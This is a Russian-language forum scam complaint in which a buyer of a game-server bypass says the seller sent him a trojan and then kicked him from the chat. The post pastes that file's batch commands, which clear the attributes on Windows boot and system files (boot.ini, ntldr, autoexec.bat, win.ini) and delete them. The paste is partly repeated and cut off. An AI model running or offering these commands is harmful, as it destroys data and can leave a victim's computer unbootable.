- 420
- 71
1. https://www.blast.hk/members/416401/ #Yankee
2. Дата и время когда это произошло. 21.12.2021 18:24
3. Ссылка на тему, описание товара, на что вы были обмануты. В вк обманут на обход сантроп
4. Подробное описание случившегося.
Я купил вход в беседу, Меня добавили в беседу все было отлично общались разговаривали, Там же был файл обход для сантропе, Я попросил чтобы он кинул мне его на что он кидает два файла один bat файл (который оказывается с троянами) кст вот его (мол трояны)) другой luac файл
Дальше он говорит мне чтобы качал оба файла я качай 1 файл без проблем качается 2 качаю который batt не качается, я ничего не подозреваю пишу им говорю вот так он не скачивается залейте его в Google диск или Yandex Disk на что он отвечает *Увы но нет, Спс за деньги* После сразу удаляет благо у меня сова удалённые сохраняются дальше я заподозрил то что в batnik файле трояны и пишу вот так трояны в файле , на что он отвечает Странно , отмечает другого человека и говорит ты знаешь что делать и кикает меня
Сказать хочу одно он обманщик не верьте ему
5. Доказательства.
2. Дата и время когда это произошло. 21.12.2021 18:24
3. Ссылка на тему, описание товара, на что вы были обмануты. В вк обманут на обход сантроп
4. Подробное описание случившегося.
Я купил вход в беседу, Меня добавили в беседу все было отлично общались разговаривали, Там же был файл обход для сантропе, Я попросил чтобы он кинул мне его на что он кидает два файла один bat файл (который оказывается с троянами) кст вот его (мол трояны)) другой luac файл
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini